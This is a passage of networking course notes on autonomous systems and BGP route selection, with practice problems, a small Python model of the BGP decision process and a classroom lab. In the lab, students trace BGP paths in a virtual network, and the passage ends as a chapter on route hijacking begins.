a network that comprises a large number of routers (and interconnecting edges). Suppose that Provider Network Y
also owns and runs a network that comprises a large number of routers and edges. Suppose the networks for both
Provider Network X and Provider Network Y are connected to the global Internet, as shown in the figure on page 396.
So far, so good.
Suppose, though, that Provider Network X is really ElCheapo Inc, and is only concerned with cost, and so has assigned
the edge weights to measure cost. For Provider Network X, which promotes itself as "The cheapest ISP in town",
delay is not a concern.
Provider Network Y, on the other hand, is really SpeedyISP Inc, and is only concerned with delay, and so has assigned
the edge weights to measure delay. For Provider Network Y, which advertises itself as "The fastest ISP in town", cost
is not a concern.
Choosing a single routing algorithm that satisfies both Provider Network X and Provider Network Y will be
problematic. If the chosen algorithm minimizes the cost, Provider Network Y might be unhappy since the delays
might be intolerable. If the chosen algorithm minimizes the delay, Provider Network X might be unhappy since the
costs might be intolerable.
Even if we could find a routing algorithm that satisfies every organization on Earth (we can't!—but suspend disbelief
for a moment), other problems would remain. Would the Pentagon want its traffic to Afghanistan routed via Iran,
even if routers within Iran were along the ideal route? Even in peacetime, a country may decide that it would like
traffic that begins and ends in the country to stay exclusively within the country; for instance, we might want traffic
from San Diego to San Antonio to avoid Mexico, even though a straight line from San Diego to San Antonio would
travel through Mexico twice. In a commercial context, an organization might not want to carry traffic that begins on
a competitor's network and ends on another competitor's network, unless the competing networks are willing to pay.
In a nutshell, the problem is that the owners of individual networks each want to set their own rules for routing within
their networks, without being concerned with what rules others are electing to follow.
So, then, what to do?
The answer (remember, this is America, and we believe in freedom!): Let entities that own portions of the Internet run their
own routing algorithms, independent from what others might be doing!
II. Autonomous Systems
This problem is solved by partitioning the Internet into a number of separate networks, called Autonomous Systems (AS's).
The organization which owns the AS may independently choose the routing algorithm of its liking to be used within the AS.
If Organization X runs AS X, it is free to run a routing algorithm within its network that minimizes cost. If Organization Y
runs AS Y, it is free to run a routing algorithm within its network that minimizes delay. We say that each AS runs an interior
routing algorithm, which is, in common parlance, referred to as an interior gateway protocol. The Internet, thus, is actually a
collection of Autonomous Systems. There are approximately 48,500 Autonomous Systems connected to the Internet today.
398
Each AS is under the control of a single administrator. AS's range in size and scope from corporations (e.g., General Motors
is an AS) to large Internet Service Providers (e.g., Comcast is an AS). Again: each AS can decide how it wants to route within
its own AS.
1. The Powers that Be
Each autonomous system (whether small, medium, or large) is given an autonomous system number (ASN) by the Internet
Corporation for Assigned Names and Numbers (ICANN). Assigning an ASN follows a similar procedure as with the assignment
of blocks of IP addresses. Referring to the picture on page 297 of the notes:
1) The Internet Assigned Numbers Authority (IANA) distributes ASNs.
2) IANA allocates blocks of ASNs to the five Regional Internet Registries.
3) Each Regional Internet Registry will distribute the ASNs as autonomous systems are developed and require an
ASN.
4) Each ASN is a 32-bit unique identifier which is typically represented as a decimal value (e.g., AS6059 is the
University of Maryland).
Although there are different sizes of ASes, they are not categorized according to their size. Rather, they are categorized
according to how they are connected to other ASes.
2. AS Categories
Stub AS
a. A stub AS has only one connection to another AS.
b. Data traffic either originates or terminates in a stub. In other words, the stub autonomous system is either a source
or destination of data.
Stub Autonomous System
Multihomed AS
a. A multihomed AS may have more than one connection to other ASes, but doesn’t allow data to transit through it.
b. This autonomous system is still either a source or destination of data.
c. A customer network is a good example of a multihomed AS. In the picture to the right, the customer network will not
support traffic that begins with a user in ISP 1 and is destined for a destination user in ISP 2.
Multihomed Autonomous System
Transit AS
a. A transit AS is connected to more than one AS.
b. A transit AS allows traffic to pass through.
c. Provider networks and the backbones are examples of transit AS's. In the picture to the right, a transit AS will support
traffic that begins with a user in ISP 1 and is destined for a destination user in ISP 2.
Transit Autonomous System
399
Practice Problem 17.1
Consider the picture below, showing the interconnection of four AS's. Note that traffic can route from New York through Paris
and Cannes and eventually get to Bonn, but traffic that goes from New York to Berlin to Bonn and on to Stuttgart cannot
proceed onward to Cannes. What are the categories of each of the AS's?
[Figure: four interconnected autonomous systems, labelled AS1, AS2, AS3 and AS4]
Solution:
Practice Problem 17.2
Problems with routing protocols arise from issues of scalability or arise from issues of administration. Classify each of the
problems below as a problem of scalability or of administration.
(a) Verizon wants Netflix to pay for routing data through its network.
(b) Routers can only hold a limited amount of table entries.
(c) Extremely large routing tables cause delays in packet forwarding.
(d) Brazil and Europe decided not to route their traffic through the United States to avoid NSA spying.
Solution:
(a)
(b)
(c)
(d)
3. Routing with Autonomous Systems
We can route among multiple networks within a single AS by using the intra-domain (interior) routing protocol decided upon
by the organization exercising administrative control of the AS. But since each AS might be doing something different, how
do we interconnect AS's to communicate with each other?
This problem requires that each AS runs, in addition to its internal protocols, a global protocol that glues all of the AS's
together. This global routing protocol is variously referred to as an inter-AS routing protocol, an inter-domain routing protocol,
or an exterior gateway protocol. Specifically, the inter-domain protocol the Internet utilizes is the Border Gateway Protocol
(BGP). Thus, in the Internet, routing between AS's is done using BGP.
400
From Tanenbaum, Computer Networks, 4th ed, Prentice Hall
III. Overview of BGP
BGP is a complex protocol. Let's first learn to appreciate this protocol by looking at an example that abstracts away many of
the complexities. Let's begin by limiting the discussion to the routers that actually run the Border Gateway Protocol—the
routers that are on the boundary of one AS and have a connection to another AS. The diagram below, for example, shows two
AS's interconnected. In this case, routers R1 and R2 would run the BGP protocol. These two routers—R1 and R2—we term
BGP routers.
401
BGP routers see the graph of the Internet very differently from ordinary routers. To a BGP router, the Internet is a set of AS's
and the links connecting them. As a simplified example, BGP routers might see the Internet as the picture shown below, where
all nodes (A through K) are BGP routers.
From Tanenbaum, Computer Networks, 4th ed, Prentice Hall
Let's say that if we superimpose AS's onto this figure, we see the picture below.
[Figure: the BGP graph above with AS's superimposed: AS1 Pentagon, AS2 Afghanistan, AS3 Comcast, AS4 AT&T, AS5 Sprint,
AS6 Death to America, AS7 Verizon, AS8 Starbucks]
Note that we see our three flavors of AS in the picture above:
• Stub AS's have a single connection to the BGP graph. Thus, stub AS's cannot route traffic that begins and ends at other
AS's. In the picture above, AS8 is a stub.
• Multi-homed AS's connect to two different AS's but refuse to carry transit traffic. For example, in the figure above,
suppose AS2 is willing to send traffic originating within AS2 to either one of its neighbors (AS5 or AS6) and is willing
to accept traffic from either one of its neighbors, provided the traffic terminates at a user in AS2. But suppose that
AS2 is not willing to route traffic from AS5 to AS6. If these conditions hold, AS2 is a multi-homed AS.
• Transit AS's are willing to carry transit traffic originating and ending in other AS's. For example, in the figure above,
if AS4 is willing to carry traffic from AS3 to AS5 (and vice versa), then AS4 is a transit AS.
Let's return to our picture of the Internet, focusing on Router F in AS1 and Router D in AS2:
402
[Figure: the BGP graph, highlighting Router F in AS1 (Pentagon) and Router D in AS2 (Afghanistan); AS6 (Death to America)
also labelled]
Each BGP router maintains a routing table to other destinations. However, BGP keeps the full path in use for each destination.
BGP routers exchange tables with neighbors telling neighbors the exact path in use.
Let's focus on AS1, the Pentagon, which wants to send data to AS2, a US command center in Afghanistan. In terms of the BGP
graph, Router F wants to send traffic to Router D.
With BGP, each of Router F's neighbors—Router B, Router E, Router I and Router G—will tell Router F the full path they use
to reach Router D. Let's look at each in turn:
Router B: "Hi Router F. When I want to reach Router D I take the path B – C – D (which is AS3 – AS6 – AS2)."
403
Router I: "Hi Router F. When I want to reach Router D I take the path I – J – H – D (which is AS4 – AS5 – AS2)."
Router G: "Hi Router F. When I want to reach Router D I take the path G – C – D (which is AS7 – AS6 – AS2)."
Note that an interesting thing happens when Router E starts to talk to Router F
404
Router E: "Hi Router F. When I want to reach Router D I take the path E – F – …"
Router F: "STOP RIGHT THERE! I'm not interested in your route since it goes through me."
The point illustrated in the picture above bears repeating: An AS will not accept a route containing its own AS number because
this will cause a routing loop to occur.
So, now Router F looks at the information it has received:
To get to Router D in AS2:
Go via Router B: The path will be: B – C – D (which is AS3 – AS6 – AS2).
Go via Router I: The path will be: I – J – H – D (which is AS4 – AS5 – AS2)
Go via Router G: The path will be: G – C – D (which is AS7 – AS6 – AS2).
Here is where the beauty (and the complexity) of BGP enters into the picture: BGP allows the AS network administrator to
impose policies on how traffic is routed. These policies are manually entered into the BGP router. So, for instance, if the
network administrator of AS1 sets the policy rule:
No traffic originating in AS1 will transit through Router C: AS6
then the BGP Router F can immediately decide on the route from Router F to Router D by modifying the table above:
To get to Router D in AS2:
Go via Router B: The path will be: B – C – D (which is AS3 – AS6 – AS2). (ruled out by policy: the path transits AS6)
Go via Router I: The path will be: I – J – H – D (which is AS4 – AS5 – AS2). (acceptable)
Go via Router G: The path will be: G – C – D (which is AS7 – AS6 – AS2). (ruled out by policy: the path transits AS6)
Let's conclude our Big Picture overview of BGP by summarizing what BGP does (and doesn't do).
A router running BGP:
• First attempts to find all paths from the router to a given destination…
• and then judges these paths against the policies of the AS administrator…
• and then selects a "good-enough" path to the destination that satisfies the policy constraints.
In the third bullet above, why did we say that BGP "selects a 'good-enough' path to the destination"? Why didn't we say that
BGP "selects an optimal path to the destination"?
The reason: BGP selects routes across multiple AS's, each having their own (potentially conflicting) definitions of optimality.
Whereas intra-domain routing algorithms (confined to operate within a single AS) can attempt to find a least-cost path, BGP
can only find a "good-enough" path that will work while satisfying policy constraints.
Thus BGP really only provides an indication of reachability—that is, the availability of routes from source to destination. BGP
makes no attempt to advertise routing optimality.
405
Unfortunately, BGP makes no attempt to provide security either—a topic we will explore.
Practice Problem 17.3
Consider the network shown below.
(a) What type of Autonomous System is AS3?
(b) What would happen if AS1 declared itself to be a multi-homed AS?
Solution:
(a)
(b)
Effect of BGP on Routing Tables
In Chapters 15 and 16 we showed how routing algorithms such as link-state routing and distance vector routing can be used to
build up routing tables within an isolated AS. In this chapter we showed how BGP routers can determine the routing decisions
for traffic that has to traverse multiple AS's.
This may leave you wondering: Do routers have two routing tables—one for routing within the AS and another for routing to a
different AS? The answer is: No, routers have a single routing table.
Once BGP routers have decided the correct paths to other autonomous systems, that information is then used to supplement the
existing routing tables for other routers within an AS. Put another way: the information gathered by BGP is incorporated into
the intra-domain routing tables.
IV. BGP Route Selection
So, how are BGP routes selected? Let's return to the notation where, from the viewpoint of a BGP router, the Internet is a
collection of interconnected AS's. Let's suppose, for example, that you are the BGP router for AS1 in the network shown
below.
Let's say that your goal is to send data to your friend in AS3. Note that your data can travel over three potential routes.
We will develop the BGP path selection algorithm incrementally. For starters, we will say that the BGP path selection algorithm
is shown in the flow chart below.
406
So, first and foremost, the AS policies are considered. After weighing the AS policies, the route that traverses the fewest
number of AS's is selected.
Practice Problem 17.4
You are the BGP router for AS1 in the network shown below, and you would like to send data to AS3.
(a) What path is used if the administrator for AS1 has set a policy that no data from AS1 may go to AS2?
(b) What path is used if the administrator for AS1 has set no specific local preferences?
Solution:
(a)
(b)
Note that the local preference does not need to be a binary go/no-go decision (such as "Do not route through AS2"). The local
preference can also be specified as an integer, where a higher integer indicates a more preferred path.33 Local preferences can
also be applied to specific network prefixes rather than an entire AS. As indicated earlier, how local preferences are structured
is completely at the discretion of the network administrator. Part of BGP's strength is the high degree to which it can be
customized.
33 Note that in BGP local preferences, higher values indicate a stronger preference. This is different from the intra-domain
routing protocols we have examined, for which lower weights were preferred (i.e., we choose paths with the lowest weight).
407
Practice Problem 17.5
Suppose that in the network below, the administrator for AS1 has set a policy that no data from AS1 may go to AS2.
Additionally, AS1 has set a local preference value of 500 on the AS4-AS5-AS3 path and a value of 100 on the AS6-AS7-AS3
path. Which path does data traverse from AS1 to AS3?
Solution:
It should be noted that we have only skimmed the surface of the BGP protocol. There are other attributes that can enter into
the path selection algorithm beyond those mentioned above (local preferences and least-number-of AS's-in-the-path).
How do ASs relate to me?
In an article first reported on the website Ars Technica in February 2014, telecommunication
companies Verizon and Cogent Communications had a disagreement over peering.34 Cogent is
a large backbone provider and also provides Internet connectivity for a “small company” called
Netflix, which by some estimates accounts for over 30 percent of current Internet traffic.
Apparently, Netflix traffic was overwhelming the links to the Verizon network causing many packets to be dropped. However,
Verizon refused to upgrade its infrastructure. Note that Verizon and Cogent have multiple peering points throughout the US.
From Verizon’s viewpoint, Cogent was sending it way more traffic than Verizon sent to them and they should pay fees for any
upgrades. This resulted in Verizon customers perceiving Netflix and anything else traversing those communications links as
being slow or unresponsive. To alleviate problems such as this, Netflix has resorted to making deals with Internet Service
Providers such as Comcast, Verizon, and AT&T to directly connect to their networks and deliver traffic.
Each company in this situation has networks large enough to be ASes. BGP is the mechanism by which these ASes advertise
routing information to each other. When two ASes feud as above, it can have a noticeable effect on their customers’ Internet
experience.
34 See http://arstechnica.com/information-technology/2014/02/netflix-packets-being-dropped-every-day-because-verizonwants-more-money/ for more details.
408
Problems
1. Which of the following are examples of why a single-protocol internet would be a concern? (Choose all that apply)
a. Across the globe, individual network administrators each want to set their own rules for routing within their
networks without being concerned with what rules others are electing to follow.
b. The world's network administrators unanimously agree on the best single routing algorithm that satisfies all of
their respective networking and routing needs.
c. Under a single-protocol internet structure, searching for a destination would be extremely time-consuming.
d. Under a single-protocol internet structure, updating the routing tables would create excessive amounts of
needless traffic.
2. Fill in the appropriate Autonomous System (AS) category or categories under each of the descriptions below.
(Choose from: Stub, Multihomed, and Transit)
a. An AS is connected to more than one other AS and it allows traffic to pass through it.
b. An AS has only one connection to another AS, and it can act as a source or destination of data.
c. An AS may be connected to one or more ASs, and it does not allow data to pass through it, but it can still act
as a source or destination of data.
d. A 'Provider Network' is a good example of this type of AS.
e. A 'Customer Network' is a good example of this type of AS.
3. True or False. BGP provides an indication of reachability which ensures that the optimal route is advertised. Explain
your answer.
4. Refer to Figure 1 below and label each AS with its correct category: Stub, Multihomed, or Transit. (Assume AS4 is
set up to pass along traffic originating from and ending in other AS's, but AS2 will not do this.)
Figure 1: Four Autonomous Systems
5. State and briefly describe the two problems solved by partitioning the Internet into a number of separate
Autonomous Systems vice using a single routing protocol.
6. If I want to use a method besides use of local preferences to ensure that our traffic does not go through ASs that are not
trusted or that are unfriendly, I would
a. secure my BGP Routers to ensure no traffic is transmitted.
b. buy all the ASs between the source and destination so I know I could trust them.
c. ignore any advertised routes that contain those dangerous ASs.
d. use MD5-hash on the link state packets I transmitted.
409
410
Security Exercise 17
Part 1: Initial Setup
Let’s put to use the networking skills we have learned to date
to better understand how the Internet works and where our
traffic is supposed to go.
1. Set-Up
Man, I love cyber! I also love basketball. Who am I and how many inches did I grow as a mid?
Equipment needed:
• A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet at the back of this exercise and have them ready to fill in.
• Your issued Laptop.
o Ensure Chrome or Firefox is installed on your Windows computer.
o Turn up the volume on your computer.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
o Wait for an IP address to be assigned to your LAN interface.
o Verify by pressing the Windows Orb key and in the program search bar, type
cmd
Hit enter to launch the Windows terminal and then, at the command prompt, execute
ipconfig
411
Now, your screen should look similar to the figure below. Your Ethernet adapter should be
assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is
a number between 101 and 254. If not, notify your instructor or lab technician.
Part 2: Welcome to the EC310 Internet!
1. A Quick Review
Once again, locate EC310 MID on your network diagram. Your Windows laptop has just joined the
virtual network you connected to previously in SX#15 and SX#16. Specifically, your Ethernet card has
been assigned an IP address on this virtual network. As before, in order for your packets to leave this
virtual network and venture out into the virtual world, your laptop must send them to a Gateway Router.
Router A serves this purpose again for the network you are connected to. However, in order to send
your packets to Router A, your computer must know several things first. Answer the following
questions using the information from ipconfig.
Question 1: What is your network address and network mask in CIDR notation?
Question 2: What is the default Gateway’s IP address?
Question 3: What protocol would your computer use to identify the MAC address of the default
Gateway?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 4: Why would your computer need to know the MAC address of the default Gateway to reach
the Internet?
New to this virtual world are a number of Autonomous Systems (ASes) which comprise the EC310
Internet. You are located in AS2016, the virtual US Naval Academy. Two Internet Service Providers
(ISPs) connect AS2016 to the remainder of the Internet: (1) AS20, Bay Area Broadband and (2) AS30,
Chesapeake Cable. The Naval Academy connects to two ISPs to provide redundancy in their
communication infrastructure and balance network traffic during peak demand. However, they do not
wish to carry traffic from Bay Area Broadband to Chesapeake Cable or vice versa.
Question 5: What category of Autonomous System is AS2016?
Question 6: What category of Autonomous System are AS20 and AS30?
For your Internet traffic to leave AS2016 it must reach Router 16. Router A does not have a direct
connection to Router 16 and therefore must learn how to reach it.
Question 7: What protocol will Router A use to discover the optimal path to the Router 16?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 8: This is an example of what type of routing protocol?
Intra-domain Routing Protocol
Inter-domain Routing Protocol
Router A discovers the optimal path to Router 16 is through a direct connection to Router C via the
2.2.2.0/29 network. Router C will forward all traffic destined for addresses external to AS2016 to
Router 16. Router 16 will decide where to forward these packets using information it has gained about
the Internet from Router 20 in AS20 and Router 30 in AS30.
412
Question 9: What protocol will Router 16 use with Router 20 and Router 30 to learn where to reach a
destination on the Internet?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 10: This is an example of what type of routing protocol?
Intra-domain Routing Protocol
Inter-domain Routing Protocol
2. A Brief Respite
Let’s be honest. It’s been a little rough these past ten weeks learning about the stack-based buffer
overflow and how computer networks interconnect. Wouldn’t it be nice for a break for a change? Have
no fear. The ECE Department, universally known as the Caring Department, has come to your aid
once again. For your viewing pleasure, in this virtual world there is a new website located at
http://www.midtube.com.
• Verify the website www.midtube.com exists by opening Firefox or Chrome on your Windows
computer (i.e., not your Cyber2 VM) and navigating to the website address.
• Log in by creating a username and password of your choice (do not use a username or password
you would not like exposed).
• Browse the website to see what information is available.
Question 11: What does the Zoomie say?
3. How Do I Get There Again?
Of course nothing is ever easy in EC310 and neither is the process to reach the MidTube webserver
across the EC310 Internet. Router 16 is responsible for directing your Internet traffic to this website and
as you just learned in Chapter 17, it goes through a path selection algorithm to determine where to send
your web requests. To better understand how this path selection algorithm works, it is important to
know what information Router 16 will receive about the Internet from its neighboring ASes. Let’s work
backwards from the target destination, MidTube’s webserver, to construct this information.
First, the MidTube webserver is located on the network 17.17.200.0/24, which is originally
advertised by Router 5 to Router 50 in AS50 and Router 60 in AS60. Once Router 50 hears about this
network, it will apply its own BGP path selection algorithm to determine if there are any local
preferences which would reject or select the path suggested by Router 5 to reach network
17.17.200.0/24. If there are no local preferences, it will compare the path received from Router 5
with all other paths that Router 50 has learned to reach 17.17.200.0/24 to determine if the path
through R5 has the shortest AS-path length. If this is true, Router 50 will prepend (i.e., put in front) its
own AS number to the AS-path list to indicate that 17.17.200.0/24 can be reached through AS50.
Router 50 will then forward this new announcement on to all other peers via a BGP update message.
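The decision process described in the paragraph above and in the Router F example of Section III (refuse routes that already contain your own ASN, apply the administrator's policy, prefer the highest local preference, then the fewest AS's, and prepend your ASN before re-advertising), as an added Python example that is not part of the EC310 notes. It uses the AS paths from the Section III example; the name of the destination prefix, the tail of Router E's path and the local preference values are constructed for illustration.

```python
"""Simplified BGP decision process (added example, not from the EC310 notes).

Models what one BGP router does with the routes its neighbours advertise:
  1. discard any route whose AS path already contains our own ASN (loop check),
  2. discard routes the administrator's policy forbids,
  3. among the survivors keep the highest LOCAL_PREF, then the fewest AS's,
  4. prepend our own ASN to the chosen path before re-advertising it to peers.
Inputs are the Router F / AS1 scenario from Section III of the notes; the
prefix name, Router E's full path and the local preference values are constructed.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Route:
    prefix: str                 # destination network the route reaches
    next_hop: str               # neighbouring BGP router that advertised it
    as_path: Tuple[int, ...]    # AS numbers traversed, nearest first, e.g. (3, 6, 2)
    local_pref: int = 100       # higher means more preferred (unlike link weights)


def loop_free(own_asn: int, route: Route) -> bool:
    """Loop check: a route that already passes through our AS is refused."""
    return own_asn not in route.as_path


def select_route(own_asn: int, candidates: Iterable[Route],
                 policy: Optional[Callable[[Route], bool]] = None) -> Optional[Route]:
    """Return the best acceptable route, or None if no route survives."""
    usable: List[Route] = [r for r in candidates if loop_free(own_asn, r)]
    if policy is not None:
        usable = [r for r in usable if policy(r)]
    if not usable:
        return None
    # Highest LOCAL_PREF wins; ties are broken by the shortest AS path.
    return min(usable, key=lambda r: (-r.local_pref, len(r.as_path)))


def advertise(own_asn: int, route: Route) -> Tuple[str, Tuple[int, ...]]:
    """The update we would send to peers: our own ASN is prepended to the path."""
    return route.prefix, (own_asn,) + route.as_path


OWN_ASN = 1             # Router F belongs to AS1 (the Pentagon in the notes)
PREFIX = "AS2-net"      # constructed stand-in name for Router D's network

# What Router F hears from its neighbours about reaching Router D (paths from the notes).
ADVERTISEMENTS = [
    Route(PREFIX, "B", (3, 6, 2)),        # B - C - D:     AS3 - AS6 - AS2
    Route(PREFIX, "I", (4, 5, 2)),        # I - J - H - D: AS4 - AS5 - AS2
    Route(PREFIX, "G", (7, 6, 2)),        # G - C - D:     AS7 - AS6 - AS2
    Route(PREFIX, "E", (4, 1, 3, 6, 2)),  # E - F - ...: goes back through AS1 (tail constructed)
]


def no_transit_via_as6(route: Route) -> bool:
    """AS1's policy from the notes: no traffic originating in AS1 transits AS6."""
    return 6 not in route.as_path


def router_f_choice() -> Optional[Route]:
    """The decision Router F makes with the AS6 policy in force."""
    return select_route(OWN_ASN, ADVERTISEMENTS, policy=no_transit_via_as6)


def router_f_choice_with_local_pref(prefs: dict) -> Optional[Route]:
    """Same advertisements, no AS6 policy, but administrator-set LOCAL_PREF values
    keyed by next hop (constructed); hops not listed keep the default of 100."""
    ranked = [Route(r.prefix, r.next_hop, r.as_path, prefs.get(r.next_hop, 100))
              for r in ADVERTISEMENTS]
    return select_route(OWN_ASN, ranked)


if __name__ == "__main__":
    for r in ADVERTISEMENTS:
        if not loop_free(OWN_ASN, r):
            status = "refused: contains our own AS"
        elif not no_transit_via_as6(r):
            status = "ruled out by policy: transits AS6"
        else:
            status = "acceptable"
        print(f"via {r.next_hop}: AS path {r.as_path} -> {status}")
    best = router_f_choice()
    print("chosen:", best.next_hop, best.as_path)
    print("re-advertised to peers:", advertise(OWN_ASN, best))
    print("with LOCAL_PREF {G: 300} and no AS6 rule:",
          router_f_choice_with_local_pref({"G": 300}).next_hop)
```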
Question 12: Assuming no local preferences are set, what path will Router 50 advertise to all other
peers to reach network 17.17.200.0/24?
• Label part a) on your network diagram with the network address and the AS-Path that Router 50
will announce to all other peers.
Once Router 30 learns about network 17.17.200.0/24 from Router 50, it will also apply its own
BGP path selection algorithm, prepend its AS number to the selected path, and announce this network
and path to its BGP peers.
Question 13: Assuming no local preferences are set, what path will Router 30 advertise to all other
peers to reach 17.17.200.0/24?
 Label part b) on your network diagram with the network address and the AS-Path that Router 30
will announce to all other peers.
Router 20 will also learn about possible paths to network 17.17.200.0/24 from its peers in a similar
fashion. It connects with another ISP, AS40, Monsoon Megabyte and a startup web hosting company,
AS2003, based in Eastern Europe. The web hosting company welcomes all traffic to it, but it does not
provide transit between autonomous systems.
Question 14: Assuming no local preferences are set, what path will Router 20 advertise to its peers to
reach 17.17.200.0/24?
 Label part c) on your network diagram with the network address and the AS-Path that Router 20
will announce to all other peers.
Finally, Router 16 will learn about the network 17.17.200.0/24 from both Router 20 and Router
30. It will also apply its own BGP path selection algorithm to decide which path it should use in order
to reach the network 17.17.200.0/24 which contains the MidTube webserver.
Question 15: Assuming no local preferences are set and comparing your answers to parts b) and c) on
your network diagram, what path will Router 16 select to get to the MidTube webserver on network
17.17.200.0/24?
 Draw a line on your network diagram of the selected path starting from EC310 MID going all the
way to the MidTube webserver.
Recall from SX#15 and SX#16 that there are two methods to discover information about the actual route
traversed between you and a destination IP address. The first method is the utility ping with the record
route option, which tells you the IP addresses of the OUTGOING interfaces along the way to and from the final
destination. The second method is the utility traceroute, which works similarly to ping except that it
tells you the address of the INCOMING interface of each hop along the path between you and your destination.
Windows has both utilities available, but we will only use the utility traceroute for this security
exercise. Additionally, it is important to know that this utility has a slightly different name in Windows,
tracert, as shown in the example in Figure 1 on page 4.
Question 16: Confirm your answer to Question 15 by performing a tracert (do not forget the –d
option) to the MidTube webserver. List the IP addresses in the order they appear on your answer sheet.
Figure 1 – Example of tracert command.
Part 3: The Return of Prof. Evil
ITSD, after discovering the malicious behavior of Prof. Evil in SX#16, conducted a thorough security
review of all routers within the USNA network. They implemented several technical solutions to
prevent a malicious actor within AS2016 from injecting false routing information into the USNA
network.
Question 17: What are two technical solutions ITSD may have implemented to protect against false
route injection within the USNA network?
With his evil plans thwarted, Prof. Evil must now look for new ways to prevent midshipmen from
reaching websites of interest. Ever since the new security policies took place, he has become
increasingly abrasive in class. In fact, he completely skipped entire sections of the last lecture and
refused to complete practice problems in class. He even asked you to read the chapter notes on your
own (the audacity!). Reluctantly, you arrange for an EI session with Prof. Evil to help prepare for the
next exam, but upon arrival to his office he shouts at you to leave immediately. Embittered, you turn to
leave but notice out of the corner of your eye a web page on his computer, www.pta.net.
 Verify that the website www.pta.net exists by opening Firefox or Chrome on your Windows
computer (i.e., not your Cyber2 VM) and navigating to the website address.
 Browse the website to see what information is available.
Question 18: What does the PTA believe concerning students' time?
Question 19: What device was used as part of a novel in-class exercise to enhance STEM-based
learning?
It seems MIDN Roy may not be the only member of the Naval Academy with an extreme ideology.
Concerned, you decide to investigate things further by identifying the source of this propaganda.
Specifically, you want to know who is responsible for publishing this content and how it can be reached
across the Internet. You speak with ITSD about this matter and discover that AS2003 hosts network
21.200.3.0/24 where the PTA webserver is located. ITSD also informs you they have
implemented several local preferences in BGP to limit Prof. Evil’s impact on the other Internet users.
Specifically, AS30, Chesapeake Cable, is weighted over AS20, Bay Area Broadband, for all traffic
destined for network 21.200.3.0/24.
Question 20: Given your discoveries, what path will Router 16 select to reach the PTA webserver on
network 21.200.3.0/24?
Question 21: Confirm your answer to Question 20 using tracert (do not forget the –d option) to
identify the actual path to the PTA webserver. Did it match your expected results?
Your friend is confused. He looks at his network diagram and realizes the shortest AS path to network
21.200.3.0/24 is directly through AS20. Why would traffic destined for this network travel
through another route?
Question 22: What is the answer to your friend’s question? Explain.
Part 4: MidTube?
Exhausted from your detailed investigation, you decide to check if there are any new videos on
MidTube because sometimes you just don’t want to pay attention in class. To increase speed and
performance your web browser stores a local copy of the webpage so it does not have to access the
MidTube webserver as often. Unfortunately, this also means that new content might be missed unless
you force your web browser to refresh.
 Navigate to the website www.midtube.com.
 When directed, force your web browser to refresh www.midtube.com using either method
below:
Ctrl + Shift + R, or Shift + the browser's reload button.
Question 23: Gasp… What shocking event just happened!?
Frustrated by EC310 yet again, you turn to your email and see the following note:
Dear EC310 Midshipmen,
I have reported you and your precious MidTube to the PTA! Your singing, dancing, and general
happiness are NOT furthering your education in my classes! Although ITSD has restricted my ability to
influence the USNA network, their authority ends at its border. Therefore, you will suffer under my
limited purview until you complete the attached assignment. Only then will I ask the PTA to restore
MidTube.
Never respectfully,
Prof. Evil
<SX19_An_Analysis_of_The_Rectabular_Excrusion_Bracket.docx>
To Be Continued… (in SX 18!)
Question 24 (Extra Credit): How was the PTA able to take down MidTube? (Hint: Think back to
SX#16)
Part 5: Clean Up
 Close all tabs in Chrome or Firefox.
 Disconnect the blue Ethernet cable.
 Turn on your wireless adapter.
Security Exercise 17 Answer Sheet
Name:
Question 1:
Question 2:
Question 3 (circle one):
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 4:
Question 5:
Question 6:
Question 7 (circle one):
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 8 (circle one):
Intra-domain Routing Protocol
Inter-domain Routing Protocol
Question 9 (circle one):
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 10 (circle one):
Intra-domain Routing Protocol
Inter-domain Routing Protocol
Question 11:
Question 12: See part a) of your network diagram.
Question 13: See part b) of your network diagram.
Question 14: See part c) of your network diagram.
Question 15: Draw the selected path on your network diagram.
Question 16:
Question 17:
Question 18:
Question 19:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24 (Extra Credit):
[Network diagram for EC310 Security Exercise 17 & 18 (figure not reproduced). Labelled elements: AS 2016 with R16, RA, RC, "Other USNA Networks", 2.2.2.0/29 and 3.3.3.0/30; AS 20 (R20); AS 30 (R30); AS 40 (R40); AS 50 (R50); AS 60 (R60); AS 2005 with R5, 17.17.200.0/24 and www.midtube.com at 17.17.200.2; AS 2003 with R3, 21.200.3.0/24 and www.pta.net at 21.200.3.2; 4.4.4.0/24; inter-router links on 7.7.7.0/30, 8.8.8.0/30, 9.9.9.0/30, 12.12.12.0/30, 13.13.13.0/30, 14.14.14.0/30, 15.15.15.0/30, 16.16.16.0/30, 18.18.18.0/30, 19.19.19.0/30 and 20.20.20.0/30 (interface addresses .1 and .2), plus one link left as ?.?.?.?/?? with a .10 address. BGP announcements shown: Network 17.17.200.0/24, AS-Path 2005 (from R5); Network 21.200.3.0/24, AS-Path 2003 (from R3, marked "SX18 ONLY"). Blank labels a), b) and c), each reading "Network: ___.___.___.___/__" and "AS-Path: ___", are to be filled in for Questions 12, 13 and 14.]
Chapter 18: Border Gateway Protocol Routing
Objectives:
(a) Given a network diagram consisting of a limited number of connected Autonomous Systems (AS) and various BGP path
announcements, determine the direction of traffic across all ASes in accordance with the BGP path selection algorithm.
(b) Identify what is required to secure Internet routing, distinguish the negative and positive consequences of various proposed
solutions, and recognize the state of security in Internet routing today.
(c) Describe the steps that should be taken to prevent false route injection in or manipulation of the Internet routing system
and identify who is responsible for performing these preventative actions and how they can be applied.
(d) State the fundamental principle of communication as it relates to security.
When we last left off in Security Exercise 17, your viewing pleasure was rudely interrupted by Prof. Evil. Specifically, Prof.
Evil contacted the Professional Teaching Association (PTA), who took it upon themselves to disrupt access to MidTube for all
Internet users. But how did the PTA pull off such a feat? More importantly, why were they able to do this and how can they
be stopped?
I. Stealing the Internet: Network Prefix Hijacking
1. MidTube? The essence of the PTA's attack rests on the same principles we saw at
